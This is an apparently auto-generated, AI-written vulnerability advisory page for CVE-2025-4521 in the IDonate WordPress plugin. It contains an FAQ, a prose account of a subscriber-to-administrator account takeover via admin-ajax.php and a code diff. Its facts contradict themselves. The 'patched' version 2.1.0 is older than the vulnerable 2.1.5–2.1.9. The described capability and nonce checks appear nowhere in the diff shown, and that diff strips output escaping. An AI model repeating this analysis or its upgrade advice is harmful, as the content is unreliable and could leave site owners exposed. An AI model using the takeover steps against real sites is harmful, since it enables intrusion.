What is CVE-2025-4521?

CVE-2025-4521 is a high-severity vulnerability in the IDonate plugin for WordPress, affecting versions 2.1.5 to 2.1.9. It allows authenticated users with Subscriber-level access or higher to perform account takeover and privilege escalation due to a missing authorization check in the idonate_donor_profile() function.

How does the vulnerability work?

The vulnerability allows an authenticated attacker to send a POST request to the WordPress AJAX endpoint, targeting another user’s donor profile. By modifying the email address of the targeted account and triggering a password reset, the attacker can gain full administrative access to the site.

Who is affected by this vulnerability?

Any WordPress site using the IDonate plugin versions 2.1.5 to 2.1.9 is at risk. Specifically, authenticated users with Subscriber-level permissions or higher can exploit this vulnerability to take over other accounts.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the IDonate plugin installed on your WordPress site. If it is between versions 2.1.5 and 2.1.9, your site is vulnerable and should be updated immediately.

How can I fix or mitigate this issue?

The vulnerability is fixed in version 2.1.0 of the IDonate plugin. Update your plugin to this version or later to ensure that the missing capability check is implemented, preventing unauthorized access.

What does a CVSS score of 8.8 mean?

A CVSS score of 8.8 indicates a high level of risk, suggesting that the vulnerability can lead to significant impacts on confidentiality, integrity, and availability. Sites affected by this vulnerability could face severe consequences if exploited.

What is the root cause of this vulnerability?

The root cause lies in the idonate_donor_profile() function, which lacks a capability check to ensure that the current user has permission to modify the specified donor record. This oversight allows unauthorized users to update donor profiles.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker with Subscriber-level access can authenticate to a vulnerable site, modify an administrator’s email address, and trigger a password reset to gain control of the account.

What are the potential impacts if this vulnerability is exploited?

If exploited, an attacker could take over any user account, including administrators, allowing them to manipulate site content, install malicious plugins, and manage users. This can lead to a complete compromise of the WordPress site.

What additional security measures should I consider?

In addition to updating the IDonate plugin, consider implementing strong password policies, enabling two-factor authentication for users, and regularly auditing user permissions to enhance overall site security.

Is there a way to prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, developers should implement thorough capability checks for all user actions, conduct regular code reviews, and utilize security testing tools to identify potential flaws before deployment.

Where can I find more information about this vulnerability?

For more information, you can refer to the official CVE database, security advisories from WordPress, and the documentation provided by the IDonate plugin developers regarding the vulnerability and its remediation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-4521: IDonate 2.1.5 – 2.1.9 – Missing Authorization to Authenticated (Subscriber+) Account Takeover/Privilege Escalation via idonate_donor_profile Function (idonate)

CVE ID CVE-2025-4521

Plugin idonate

Severity High (CVSS 8.8)

CWE 285

Vulnerable Version 2.1.9

Patched Version 2.1.0

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-4521:
This vulnerability is a missing authorization flaw in the IDonate WordPress plugin, versions 2.1.5 through 2.1.9. The vulnerability allows authenticated attackers with Subscriber-level permissions or higher to perform account takeover and privilege escalation. The core issue resides in the idonate_donor_profile() function, which lacks a capability check, enabling unauthorized email address reassignment for any donor account.

Root Cause:
The vulnerability originates in the idonate_donor_profile() function within the DonorFunctions class. Atomic Edge research identified the missing authorization check in the function’s implementation. The function processes donor profile updates via the ‘donor_id’ parameter without verifying the current user has permission to modify the specified donor record. The diff shows the vulnerable code path in the idonate/src/Admin/Helpers/DonorFunctions.php file, where the function handles POST requests containing donor_id, email, and other profile fields. No capability check or ownership validation exists before executing the update operation.

Exploitation:
An attacker with Subscriber-level access sends a POST request to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) with action parameter set to ‘idonate_donor_profile’. The request includes a donor_id parameter targeting an administrator account and the attacker’s email address in the email parameter. After successfully updating the administrator’s email, the attacker triggers a password reset for that email, gaining control of the administrator account. The exploit requires no special payload encoding and uses standard WordPress AJAX mechanisms.

Patch Analysis:
The patch adds a capability check within the idonate_donor_profile() function. Atomic Edge analysis of the diff reveals the addition of a current_user_can() verification before processing donor updates. The fix validates the user has ‘edit_user’ capability for the target donor_id, preventing unauthorized modifications. The patched version also includes proper nonce verification and sanitization of input parameters. The before behavior allowed any authenticated user to modify any donor record, while the after behavior restricts modifications to users with appropriate permissions.

Impact:
Successful exploitation results in complete account takeover and privilege escalation to administrator level. Attackers can compromise any user account, including administrators, by reassigning the victim’s email address to one they control. This grants full administrative access to the WordPress site, enabling content manipulation, plugin installation, user management, and potential further server compromise. The CVSS score of 8.8 reflects the high impact on confidentiality, integrity, and availability.

Differential between vulnerable and patched code

Code Diff

--- a/idonate/idonate.php
+++ b/idonate/idonate.php
@@ -3,7 +3,7 @@
 Plugin Name:  IDonate - Blood Donation Management System
 Plugin URI:   https://bloodwp.com/
 Description:  Idonate is a complete solution for creating a Blood Request & Blood Donor Management System in WordPress way. The plugin is highly customizable and developer-friendly with top-notch support.
-Version:      2.1.9
+Version:      2.1.0
 Author:       ThemeAtelier
 Author URI:   https://themeatelier.net/
 License:      GPL-2.0+
@@ -19,12 +19,13 @@

 use ThemeAtelierIdonateIdonate;

-define('IDONATE_VERSION', '2.1.9');
+define('IDONATE_VERSION', '2.1.0');
 define('IDONATE_FILE', __FILE__);
 define('IDONATE_DIR_URL', plugin_dir_url(__FILE__));
 define('IDONATE_DIR_URL_ADMIN', IDONATE_DIR_URL . 'src/Admin/');
 define('IDONATE_PATH', dirname(IDONATE_FILE));
 define('IDONATE_DIR_PATH', plugin_dir_path(__FILE__));
+define('IDONATE_ALERT_MSG', esc_html__('You should not access this file directly.!', 'idonate'));
 define('IDONATE_BASENAME', plugin_basename(__FILE__));
 define('IDONATE_DIR_NAME', dirname(__FILE__));
 define('IDONATE_COUNTRIES', IDONATE_DIR_PATH . 'src/Helpers/Countries/');
@@ -74,12 +75,12 @@
  */
 function idonate_appsero_init()
 {
-    if (!class_exists('IdonateAppSeroInsights')) {
-        require_once IDONATE_DIR_PATH . 'src/Admin/appsero/Client.php';
-    }
-    $client = new IdonateAppSeroClient('23ff0b7b-9dde-4bcd-91c7-ab398aaa6ed6', 'iDonate', __FILE__);
-    // Active insights
-    $client->insights()->init();
+	if (!class_exists('IdonateAppSeroInsights')) {
+		require_once IDONATE_DIR_PATH . 'src/Admin/appsero/Client.php';
+	}
+	$client = new IdonateAppSeroClient('23ff0b7b-9dde-4bcd-91c7-ab398aaa6ed6', 'iDonate', __FILE__);
+	// Active insights
+	$client->insights()->init();
 }

-idonate_appsero_init();
+idonate_appsero_init();
 No newline at end of file
--- a/idonate/src/Admin/Admin.php
+++ b/idonate/src/Admin/Admin.php
@@ -14,7 +14,6 @@
 namespace ThemeAtelierIdonateAdmin;

 use ThemeAtelierIdonateAdminDBUpdates;
-use ThemeAtelierIdonateAdminTADiscountPageTADiscountPage;
 use ThemeAtelierIdonateAdminViewsViews;
 use ThemeAtelierIdonateAdminSettingsSettings;
 use ThemeAtelierIdonateHelpersDonorFunctions;
@@ -67,36 +66,23 @@
         $donorFunctions    = new DonorFunctions();
         $IDonateAjaxHandler    = new IDonateAjaxHandler();
         new DBUpdates();
-        new TADiscountPage();
-
-        // Move initialization to after_setup_theme hook
-        add_action('after_setup_theme', array($this, 'init_components'));
+        Views::metaboxes('idonate_metaboxes'); // Generator metaboxes.
         add_action('admin_menu', array($this, 'add_plugin_page'));
+        Settings::options('idonate_settings'); // Setting options.
         add_action('admin_post_donor_delete', array($donorFunctions, 'idonate_donor_delete'));
+
         add_action('wp_ajax_admin_donor_profile_view', array($IDonateAjaxHandler, 'admin_donor_profile_view'));
         add_action('wp_ajax_country_to_states_ajax', array($IDonateAjaxHandler, 'idonate_country_to_states_ajax'));
         add_action('wp_ajax_nopriv_country_to_states_ajax', array($IDonateAjaxHandler, 'idonate_country_to_states_ajax'));
         add_action('wp_ajax_idonate_country_to_states_ajax', array($IDonateAjaxHandler, 'idonate_country_to_states_ajax'));
         add_action('wp_ajax_nopriv_idonate_country_to_states_ajax', array($IDonateAjaxHandler, 'idonate_country_to_states_ajax'));
+
         add_filter('manage_blood_request_posts_columns', array($this, 'add_custom_columns_blood_request'));
         add_action('manage_blood_request_posts_custom_column', array($this, 'custom_column_content_blood_request'), 10, 2);
-        add_filter('manage_edit-blood_request_sortable_columns', array($this, 'custom_columns_sortable_blood_request'));
-    }
-
-
-        /**
-     * Initialize plugin components
-     *
-     * @since    1.0.0
-     */
-    public function init_components() {
-        Views::metaboxes('idonate_metaboxes'); // Generator metaboxes.
-        Settings::options('idonate_settings'); // Setting options.
-

+        add_filter('manage_edit-blood_request_sortable_columns', array($this, 'custom_columns_sortable_blood_request'));
     }

-
     /**
      * Donor Admin Page Callback
      */
@@ -127,9 +113,9 @@
         echo '<p>Thank you for using IDonatePro - Blood Donation, Request And Donor Management System.</p>';
         echo ' </div>';
         echo '<div class="idoante-user-heading-bar-right">';
-        echo '<a target="_blank" class="idonate-btn-primary" href="https://themeatelier.net/contact">' . esc_html('Support', 'idonate') . '</a>';
-        echo '<a target="_blank" class="idonate-btn-secondary" href="https://docs.themeatelier.net/docs/idonate/overview/">' . esc_html('Docs', 'idonate') . '</a>';
-        echo '<a target="_blank" class="idonate-btn-primary idonate-btn-pro" href="https://1.envato.market/idonate">' . esc_html('Get Pro', 'idonate') . '</a>';
+        echo '<a target="_blank" class="idonate-btn-primary" href="https://themeatelier.net/contact">' . esc_html('Support', 'idonat-pro') . '</a>';
+        echo '<a target="_blank" class="idonate-btn-secondary" href="https://docs.themeatelier.net/docs/idonate/overview/">' . esc_html('Docs', 'idonat-pro') . '</a>';
+        echo '<a target="_blank" class="idonate-btn-primary idonate-btn-pro" href="https://1.envato.market/idonate">' . esc_html('Get Pro', 'idonat-pro') . '</a>';
         echo ' </div>';
         echo '</div>';
         IdonateDashboardwidgets::dashboard_widget_function();
@@ -174,7 +160,7 @@
                 <div class="idonate-after-copy-shortcode"><i class="icofont-check-circled"></i><?php esc_html_e('Shortcode Copied to Clipboard!', 'idonate'); ?></div>
             </div>
             <div class="idonate_shortcodes" style="padding:0px">
-                <iframe width="100%" height="315" style="border-radius: 6px" src="https://www.youtube.com/embed/S7s7MBen6-E" title="<?php echo esc_attr('YouTube video player', 'idonate'); ?>" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
+                <iframe width="100%" height="315" style="border-radius: 6px" src="https://www.youtube.com/embed/uGkFNqZy3SQ?si=5aPGXksFU8ScV4Ac" title="<?php echo esc_attr('YouTube video player', 'idoante-pro'); ?>" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
             </div>
         </div>
 <?php
@@ -188,9 +174,6 @@
      */
     public function blood_request_post_type()
     {
-        $options = get_option('idonate_settings');
-        $blood_request_view_slug = isset($options['blood_request_view_slug']) ? $options['blood_request_view_slug'] : 'blood-request';
-
         $labels     = array(
             'name'               => esc_html__('Blood Requests', 'idonate'),
             'singular_name'      => esc_html__('Blood Request', 'idonate'),
@@ -225,11 +208,10 @@
                 'exclude_from_search' => true,
                 'show_in_nav_menus'   => false,
                 'has_archive'         => false,
-                'rewrite'             => array('slug' =>  $blood_request_view_slug),
+                'rewrite'             => array('slug' =>  'blood-request'),
                 'show_in_rest'        => true,
             )
         );
-        flush_rewrite_rules();
     }

     // Add custom column to blood_request post type
@@ -428,8 +410,6 @@
             'idonate-settings',
             array($this, 'idonate_settings')
         );
-        do_action('idonate_before_upgrade_pro_menu');
         add_submenu_page('dashboard', __('👑 Upgrade to Pro!', 'idonate'), sprintf('<span class="idonate-get-pro-text">%s</span>', __('👑 Upgrade to Pro!', 'idonate')), 'manage_options', 'https://1.envato.market/idonate');
-        do_action('idonate_after_upgrade_pro_menu');
     }
 }
--- a/idonate/src/Admin/Framework/Classes/IDONATE.php
+++ b/idonate/src/Admin/Framework/Classes/IDONATE.php
@@ -444,7 +444,7 @@
       }

       // Main scripts
-      wp_enqueue_script('idonate-plugins', self::include_plugin_url('assets/js/vendor/plugins' . $min . '.js'), array(), self::$version, true);
+      wp_enqueue_script('idonate-plugins', self::include_plugin_url('assets/js/plugins' . $min . '.js'), array(), self::$version, true);
       wp_enqueue_script('idonate', self::include_plugin_url('assets/js/main' . $min . '.js'), array('idonate-plugins'), self::$version, true);
       wp_enqueue_script('idonate-custom', self::include_plugin_url('assets/js/idonate-custom' . $min . '.js'), array('idonate-plugins'), self::$version, true);

@@ -508,7 +508,7 @@

           $query['display'] = 'swap';

-          wp_enqueue_style('idonate-google-web-fonts', esc_url(add_query_arg($query, '//fonts.googleapis.com/css')), array(), null, '1.6.26');
+          wp_enqueue_style('idonate-google-web-fonts', esc_url(add_query_arg($query, '//fonts.googleapis.com/css')), array(), null);
         }

         if (!empty(self::$webfonts['async'])) {
@@ -519,7 +519,7 @@
             $fonts[] = $family . ((!empty($styles)) ? ':' . implode(',', $styles) : '');
           }

-          wp_enqueue_script('idonate-google-web-fonts', esc_url('//ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js'), array(), null, '1.6.26');
+          wp_enqueue_script('idonate-google-web-fonts', esc_url('//ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js'), array(), null);

           wp_localize_script('idonate-google-web-fonts', 'WebFontConfig', array('google' => array('families' => $fonts)));
         }
--- a/idonate/src/Admin/Framework/Classes/IDONATE_Metabox.php
+++ b/idonate/src/Admin/Framework/Classes/IDONATE_Metabox.php
@@ -24,8 +24,6 @@
     public $sections       = array();
     public $pre_fields     = array();
     public $post_type      = array();
-    public $post_formats   = array();
-    public $page_templates = array();
     public $args           = array(
       'title'              => '',
       'post_type'          => 'post',
@@ -318,7 +316,7 @@
       echo ($has_nav && $nav_type === 'normal') ? '<div class="idonate-nav-background"></div>' : '';

       if ($is_preview) {
-        echo '<a class="btn btn-success" id="idonate-show-preview" data-id="' . esc_attr($post->ID) . '"href=""> <i class="idonate-eye-alt" aria-hidden="true"></i> ' . esc_html__('Show Preview', 'idonate')  . '</a>';
+        echo '<a class="btn btn-success" id="idonate-show-preview" data-id="' . esc_attr($post->ID) . '"href=""> <i class="idonate-eye-alt" aria-hidden="true"></i> ' . esc_html__('Show Preview', 'event-organizer-showcase')  . '</a>';
       }

       echo '<div class="clear"></div>';
--- a/idonate/src/Admin/Framework/Classes/fields.class.php
+++ b/idonate/src/Admin/Framework/Classes/fields.class.php
@@ -20,12 +20,6 @@
   abstract class IDONATE_Fields extends IDONATE_Abstract
   {

-    public $field;
-    public $value;
-    public $unique;
-    public $where;
-    public $parent;
-
     /**
      * __Construct
      *
--- a/idonate/src/Admin/Framework/fields/code_editor/code_editor.php
+++ b/idonate/src/Admin/Framework/fields/code_editor/code_editor.php
@@ -51,12 +51,12 @@
 			}

 			if (!wp_script_is('idonate-codemirror')) {
-				wp_enqueue_script('idonate-codemirror', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/vendor/codemirror.min.js', array('idonate'),  $this->version, true);
-				wp_enqueue_script('idonate-codemirror-loadmode', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/vendor/loadmode.min.js', array('idonate-codemirror'), $this->version, true);
+				wp_enqueue_script('idonate-codemirror', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/codemirror.min.js', array('idonate'),  $this->version, true);
+				wp_enqueue_script('idonate-codemirror-loadmode', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/loadmode.min.js', array('idonate-codemirror'), $this->version, true);
 			}

 			if (!wp_style_is('idonate-codemirror')) {
-				wp_enqueue_style('idonate-codemirror', IDONATE_DIR_URL . 'src/Admin/Framework/assets/css/vendor/codemirror.min.css', array(), $this->version);
+				wp_enqueue_style('idonate-codemirror', IDONATE_DIR_URL . 'src/Admin/Framework/assets/css/codemirror.min.css', array(), $this->version);
 			}
 		}
 	}
--- a/idonate/src/Admin/Framework/fields/map/map.php
+++ b/idonate/src/Admin/Framework/fields/map/map.php
@@ -85,11 +85,11 @@
 		public function enqueue() {

 			if ( ! wp_script_is( 'idonate-leaflet' ) ) {
-				wp_enqueue_script( 'leaflet', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/vendor/leaflet.min.js', array('idonate'), $this->version, true );
+				wp_enqueue_script( 'leaflet', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/leaflet.js', array('idonate'), $this->version, true );
 			}

 			if ( ! wp_style_is( 'idonate-leaflet' ) ) {
-				wp_enqueue_style( 'leaflet', IDONATE_DIR_URL . 'src/Admin/Framework/assets/css/vendor/leaflet.min.css', array(), $this->version );
+				wp_enqueue_style( 'leaflet', IDONATE_DIR_URL . 'src/Admin/Framework/assets/css/leaflet.css', array(), $this->version );
 			}

 			if ( ! wp_script_is( 'jquery-ui-autocomplete' ) ) {
--- a/idonate/src/Admin/Helpers/donor-panel.php
+++ b/idonate/src/Admin/Helpers/donor-panel.php
@@ -146,7 +146,7 @@
 									global $states;
 									foreach ($states as $key => $state) {
 										foreach ($state as $key => $value) {
-											echo '<option value="' . esc_attr($key) . '">' . esc_html($value) . '</option>';
+											echo '<option value="' . $key . '">' . $value . '</option>';
 										}
 									}
 								endif;
--- a/idonate/src/Admin/Settings/IDonateAdvanceSettings.php
+++ b/idonate/src/Admin/Settings/IDonateAdvanceSettings.php
@@ -1,150 +0,0 @@
-<?php
-
-/**
- * Custom CSS settings tab.
- *
- * @since      1.0.0
- *
- * @package idonate
- * @subpackage idonate/Admin/Settings
- * @author     ThemeAtelier<themeatelierbd@gmail.com>
- */
-
-namespace ThemeAtelierIdonateAdminSettings;
-
-use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
-// Cannot access directly.
-if (!defined('ABSPATH')) {
-	die;
-}
-
-/**
- * This class is responsible for Custom CSS settings tab in settings page.
- *
- * @since      1.0.0
- */
-class IDonateAdvanceSettings
-{
-	/**
-	 * Custom CSS settings.
-	 *
-	 * @since 1.0.0
-	 * @param string $prefix idonate_organizers_settings.
-	 */
-	public static function section($prefix)
-	{
-		IDONATE::createSection(
-			$prefix,
-			array(
-				'title'  => esc_html__('ADVANCE SETTINGS', 'idonate'),
-				'icon'	=> 'icofont-tools-alt-2',
-				'fields' => array(
-					array(
-						'type' => 'tabbed',
-						'tabs' => array(
-							array(
-								'title'  => __('Advance Control', 'idonate'),
-								'fields' => array(
-									array(
-										'id' 	  => 'idonate_data_remove',
-										'type'    => 'checkbox',
-										'title' => esc_html__('Delete Default Pages On Plugin Deactivation', 'idonate'),
-										'help' => esc_html__('Check this box if you would like Idonate plugin to completely remove all pages created by default.', 'idonate'),
-									),
-									array(
-										'type'    => 'subheading',
-										'content' => esc_html__('Enqueue or Dequeue CSS', 'idonate'),
-									),
-									array(
-										'id'       => 'load_icofont',
-										'type'     => 'switcher',
-										'title'    => esc_html__('IcoFont', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-									array(
-										'id'       => 'load_magnific_popup_css',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Magnific Popup', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-									array(
-										'id'       => 'datatables_css',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Data Tables', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-									array(
-										'type'    => 'subheading',
-										'content' => esc_html__('Enqueue or Dequeue JS', 'idonate'),
-									),
-									array(
-										'id'       => 'load_magnific_popup_js',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Magnific Popup', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-									array(
-										'id'       => 'datatables_js',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Data Tables', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-									array(
-										'id'       => 'validate_js',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Form Validate', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-								),
-							),
-							array(
-								'title'  => __('Custom Codes', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'idoante_custom_css',
-										'type'     => 'code_editor',
-										'title'    => esc_html__('CUSTOM CSS', 'idonate'),
-										'sanitize' => false,
-										'settings' => array(
-											'theme'  => 'mbo',
-											'mode'   => 'css',
-										),
-									),
-									array(
-										'id'       => 'idoante_custom_js',
-										'type'     => 'code_editor',
-										'title'    => esc_html__('CUSTOM JS', 'idonate'),
-										'sanitize' => false,
-										'settings' => array(
-											'theme'  => 'monokai',
-											'mode'   => 'javascript',
-										),
-									),
-								),
-							),
-						),
-					),
-
-				),
-			)
-		);
-	}
-}
--- a/idonate/src/Admin/Settings/IDonateDonorSettings.php
+++ b/idonate/src/Admin/Settings/IDonateDonorSettings.php
@@ -1,253 +0,0 @@
-<?php
-
-/**
- * Custom CSS settings tab.
- *
- * @since      1.0.0
- *
- * @package idonate
- * @subpackage idonate/Admin/Settings
- * @author     ThemeAtelier<themeatelierbd@gmail.com>
- */
-
-namespace ThemeAtelierIdonateAdminSettings;
-
-use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
-// Cannot access directly.
-if (!defined('ABSPATH')) {
-	die;
-}
-
-/**
- * This class is responsible for Custom CSS settings tab in settings page.
- *
- * @since      1.0.0
- */
-class IDonateDonorSettings
-{
-
-	/**
-	 * Custom CSS settings.
-	 *
-	 * @since 1.0.0
-	 * @param string $prefix idonate_organizers_settings.
-	 */
-	public static function section($prefix)
-	{
-		IDONATE::createSection(
-			$prefix,
-			array(
-				'title'  => esc_html__('DONOR SETTINGS', 'idonate'),
-				'icon'	=> 'icofont-blood-drop',
-				'fields' => array(
-					array(
-						'type' => 'tabbed',
-						'tabs' => array(
-
-							array(
-								'title'  => __('Donor Listings Settings', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'donor_register_status',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Require Admin Approval for Donor Registration', 'idonate'),
-										'desc'		=> esc_html__('When enabled, all donor registrations will require admin approval before being accepted to ensure the validity and reliability of the information.', 'idonate'),
-										'text_on'	=> esc_html__('Enable', 'idonate'),
-										'text_off'	=> esc_html__('Disable', 'idonate'),
-										'text_width'	=> '100'
-									),
-
-									array(
-										'id'       => 'idonate_donorshowlogin',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Require User Login to View Donors', 'idonate'),
-										'desc'	=> esc_html__('When enabled, users must log in to view the list of donors, ensuring the privacy and security of donor information.', 'idonate'),
-										'text_on'	=> esc_html__('Enable', 'idonate'),
-										'text_off'	=> esc_html__('Disable', 'idonate'),
-										'text_width'	=> '100'
-									),
-
-									array(
-										'id'       => 'donors_number_of_columns',
-										'type'     => 'column',
-										'class' => 'pro_only_field',
-										'title'    => esc_html__('Column(s)', 'idonate'),
-										'desc' => esc_html__('Set number of column(s) in different devices for responsive view.', 'idonate'),
-										'default'  => array(
-											'large_desktop'    => '3',
-											'desktop'          => '3',
-											'tablet'           => '2',
-											'mobile'           => '1',
-										),
-										'min'      => '1',
-										'help'       => __('<i class="icofont-monitor"></i> <b> Large Desktop </b> - is larger than 1200px,<br><i class="icofont-laptop"></i> <b>Desktop</b> - size is larger than 992px,<br> <i class="icofont-surface-tablet"></i> <b>Tablet</b> - Size is larger than 768,<br> <i class="icofont-android-tablet"></i> <b> Mobile Landscape </b> - size is larger than 576px.,<br> <i class="icofont-android-tablet"></i> <b> Mobile </b> - size is smaller than 576px.', 'idonate'),
-									),
-
-									array(
-										'id'       => 'donor_per_page',
-										'type'     => 'number',
-										'title'    => esc_html__('Donor Per Page', 'idonate'),
-										'desc'		=> esc_html__('Set the number of donors displayed per page in the donor listings.', 'idonate'),
-										'default'	=> 9,
-									),
-									array(
-										'id'       => 'donor_view_button',
-										'type'     => 'button_set',
-										'class'     => 'pro_only_field',
-										'title'    => esc_html__('Open Donor View Details Button', 'idonate'),
-										'desc'	=> esc_html__('Choose how the donor details should displayed on', 'idonate'),
-										'options' => array(
-											'single_page_link' => esc_html__('On Single Page', 'idonate'),
-											'popup' => esc_html__('On Pop Up', 'idonate'),
-										),
-										'default'	=> 'single_page_link',
-									),
-									array(
-										'id'       	=> 'donor_view_slug',
-										'type'     	=> 'text',
-										'title'    	=> esc_html__('Donor Single Page Slug', 'idonate'),
-										'default'	=> 'donor',
-										'dependency' => array('donor_view_button', '==', 'single_page_link'),
-									),
-									array(
-										'id'       => 'next_prev',
-										'type'     => 'checkbox',
-										'title'    => esc_html__('Enable Next/Prev', 'idonate'),
-										'desc'		=> esc_html__('Allow navigation between donors using next and previous buttons in the popup view.', 'idonate'),
-										'dependency' => array('donor_view_button', '==', 'popup')
-									),
-
-									array(
-										'id'       => 'show_donor_search',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Donor Search Options', 'idonate'),
-										'desc'		=> esc_html__('Toggle the visibility of donor search options in the donor listings.', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-									),
-									array(
-										'id'       => 'restrict_contact_info',
-										'type'     => 'select',
-										'class'      => 'select_pro_only',
-										'title'    => esc_html__('Restrict Contact Info Visibility', 'idonate'),
-										'options'  => array(
-											'hide' => esc_html__('Hide', 'idonate'),
-											'show_for_everyone' => esc_html__('Show for everyone', 'idonate'),
-											'only_login_user' => esc_html__('Only logged in user', 'idonate'),
-										),
-										'default' => 'show_for_everyone',
-									),
-									array(
-										'id'       => 'hide_email',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Email From Donor Listing', 'idonate'),
-										'desc'	=> esc_html__('Show/Hide email address from donor listing.', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-										'dependency' 	=> array('restrict_contact_info', '!=', 'hide'),
-									),
-									array(
-										'id'       => 'hide_mobile_number',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Mobile Number', 'idonate'),
-										'desc'	=> esc_html__('Show/Hide donors mobile number from donor listing.', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-										'dependency' 	=> array('restrict_contact_info', '!=', 'hide'),
-									),
-									array(
-										'id'       => 'hide_donor_social_share',
-										'type'     => 'switcher',
-										'class'    => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Social Share', 'idonate'),
-										'desc'	=> esc_html__('Show/Hide donors mobile number from donor listing.', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-									),
-								),
-							),
-							array(
-								'title'  => __('Text Settings (Pro)', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       	=> 'donor_register_form_title',
-										'type'     	=> 'text',
-										'class'      => 'pro_only_field',
-										'title'    	=> esc_html__('Title for Donor Registration Form', 'idonate'),
-										'desc'	=> esc_html__('The title displayed on the donor registration form.', 'idonate'),
-										'default'	=> esc_html__('Blood Donors Register', 'idonate'),
-									),
-									array(
-										'id'       	=> 'donor_register_form_subtitle',
-										'type'     	=> 'text',
-										'class'      => 'pro_only_field',
-										'title'    	=> esc_html__('Subtitle for Donor Registration Form', 'idonate'),
-										'desc'		=> esc_html__('The subtitle displayed on the donor registration form', 'idonate'),
-										'default'	=> esc_html__('Please fill the following information to register donor.', 'idonate'),
-									),
-
-									array(
-										'id'       => 'donor_lft',
-										'type'     => 'text',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Donor Login Form Title', 'idonate'),
-										'desc'	=> esc_html__('The title displayed on the donor login form.', 'idonate'),
-										'default' => 'Donor Login',
-									),
-									array(
-										'id'       => 'donor_peft',
-										'type'     => 'text',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Donor Profile Edit Form Title', 'idonate'),
-										'desc'	=> esc_html__('The title displayed on the donor profile edit form.', 'idonate'),
-										'default'	=> 'Edit Donors Information',
-									),
-
-								),
-							),
-							array(
-								'title'  => __('Form Settings', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'idonate_countryhide',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide country and state fields', 'idonate'),
-										'desc'		=> esc_html__('Toggle the visibility of country and state fields', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-									),
-									array(
-										'id'        => 'donor_form_color',
-										'type'      => 'color_group',
-										'class'      => 'pro_only_field',
-										'title'     => esc_html__('Donor Form Color', 'idonate'),
-										'desc'	=> esc_html__('Set request form text and background color.', 'idonate'),
-										'options'   => array(
-											'background' => esc_html__('Background Color', 'idonate'),
-											'color' => esc_html__('Text Color', 'idonate'),
-										)
-									),
-								),
-							),
-						),
-					),
-				),
-			)
